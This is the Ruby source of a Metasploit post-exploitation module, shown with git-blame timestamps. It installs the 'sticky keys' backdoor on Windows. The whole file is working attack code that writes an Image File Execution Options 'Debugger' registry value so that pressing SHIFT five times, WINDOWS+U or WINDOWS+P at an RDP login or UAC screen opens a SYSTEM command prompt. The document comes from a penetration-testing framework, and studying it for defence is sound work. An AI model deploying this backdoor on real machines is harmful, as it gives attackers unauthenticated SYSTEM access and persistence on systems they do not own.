2015-07-23 02:18:10 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit4 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Registry
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
|
|
|
|
DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
|
|
|
|
DEBUG_REG_VALUE = 'Debugger'
|
2015-07-23 03:17:34 +00:00
|
|
|
|
2015-07-23 22:01:58 +00:00
|
|
|
def initialize(info = {})
|
2015-07-23 03:17:34 +00:00
|
|
|
super(update_info(info,
|
2015-07-23 22:01:58 +00:00
|
|
|
'Name' => 'Sticky Keys Persistance Module',
|
|
|
|
'Description' => %q{
|
2015-07-23 02:18:10 +00:00
|
|
|
This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
|
|
|
|
rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
|
|
|
|
login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
|
|
|
|
for certain executables.
|
|
|
|
|
|
|
|
The module options allow for this hack to be applied to:
|
|
|
|
|
2015-07-29 17:29:09 +00:00
|
|
|
SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),
|
|
|
|
UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),
|
|
|
|
OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and
|
|
|
|
DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).
|
2015-07-23 02:18:10 +00:00
|
|
|
|
|
|
|
The hack can be added using the ADD action, and removed with the REMOVE action.
|
|
|
|
|
|
|
|
Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
|
|
|
|
to the target prior to running the module. By default, a SYSTEM command prompt is installed
|
|
|
|
using the registry method if this module is run without modifying any parameters.
|
|
|
|
},
|
2015-07-23 22:01:58 +00:00
|
|
|
'Author' => ['OJ Reeves'],
|
|
|
|
'Platform' => ['win'],
|
|
|
|
'SessionTypes' => ['meterpreter', 'cmd'],
|
|
|
|
'Actions' => [
|
2015-07-23 22:09:25 +00:00
|
|
|
['ADD', {'Description' => 'Add the backdoor to the target.'}],
|
|
|
|
['REMOVE', {'Description' => 'Remove the backdoor from the target.'}]
|
2015-07-23 22:01:58 +00:00
|
|
|
],
|
2015-07-29 17:31:43 +00:00
|
|
|
'References' => [
|
|
|
|
['URL', 'https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],
|
2015-07-29 17:32:38 +00:00
|
|
|
['URL', 'http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html']
|
2015-07-29 17:31:43 +00:00
|
|
|
],
|
2015-07-23 22:01:58 +00:00
|
|
|
'DefaultAction' => 'ADD'
|
2015-07-23 02:18:10 +00:00
|
|
|
))
|
|
|
|
|
|
|
|
register_options([
|
2015-07-23 21:20:31 +00:00
|
|
|
OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
|
2015-07-23 22:12:17 +00:00
|
|
|
OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered.', '%SYSTEMROOT%\system32\cmd.exe'])
|
2015-07-23 02:18:10 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the name of the executable to modify the debugger settings of.
|
|
|
|
#
|
|
|
|
def get_target_exe_name
|
|
|
|
case datastore['TARGET']
|
|
|
|
when 'UTILMAN'
|
2015-07-23 21:20:31 +00:00
|
|
|
'Utilman.exe'
|
2015-07-23 02:18:10 +00:00
|
|
|
when 'OSK'
|
|
|
|
'osk.exe'
|
2015-07-23 21:20:31 +00:00
|
|
|
when 'DISP'
|
|
|
|
'DisplaySwitch.exe'
|
2015-07-23 02:18:10 +00:00
|
|
|
else
|
|
|
|
'sethc.exe'
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the the key combinations required to invoke the exploit once installed.
|
|
|
|
#
|
|
|
|
def get_target_key_combo
|
|
|
|
case datastore['TARGET']
|
|
|
|
when 'UTILMAN'
|
|
|
|
'WINDOWS+U'
|
|
|
|
when 'OSK'
|
|
|
|
'WINDOWS+U, then launching the on-screen keyboard'
|
2015-07-23 21:20:31 +00:00
|
|
|
when 'DISP'
|
|
|
|
'WINDOWS+P'
|
2015-07-23 02:18:10 +00:00
|
|
|
else
|
|
|
|
'SHIFT 5 times'
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the full path to the target's registry key based on the current target
|
|
|
|
# settings.
|
|
|
|
#
|
|
|
|
def get_target_exe_reg_key
|
|
|
|
"#{DEBUG_REG_PATH}\\#{get_target_exe_name}"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Runs the exploit.
|
|
|
|
#
|
|
|
|
def run
|
|
|
|
unless is_admin?
|
2015-07-23 03:14:35 +00:00
|
|
|
fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
|
2015-07-23 02:18:10 +00:00
|
|
|
end
|
|
|
|
|
2015-07-23 22:01:58 +00:00
|
|
|
print_good("Session has administrative rights, proceeding.")
|
2015-07-23 02:18:10 +00:00
|
|
|
|
|
|
|
target_key = get_target_exe_reg_key
|
|
|
|
|
2015-07-23 22:01:58 +00:00
|
|
|
if action.name == 'ADD'
|
2015-07-23 02:18:10 +00:00
|
|
|
command = expand_path(datastore['EXE'])
|
|
|
|
|
|
|
|
registry_createkey(target_key)
|
|
|
|
registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')
|
|
|
|
|
|
|
|
print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")
|
|
|
|
else
|
|
|
|
registry_deletekey(target_key)
|
|
|
|
print_good("'Sticky keys' removed from registry key #{target_key}.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|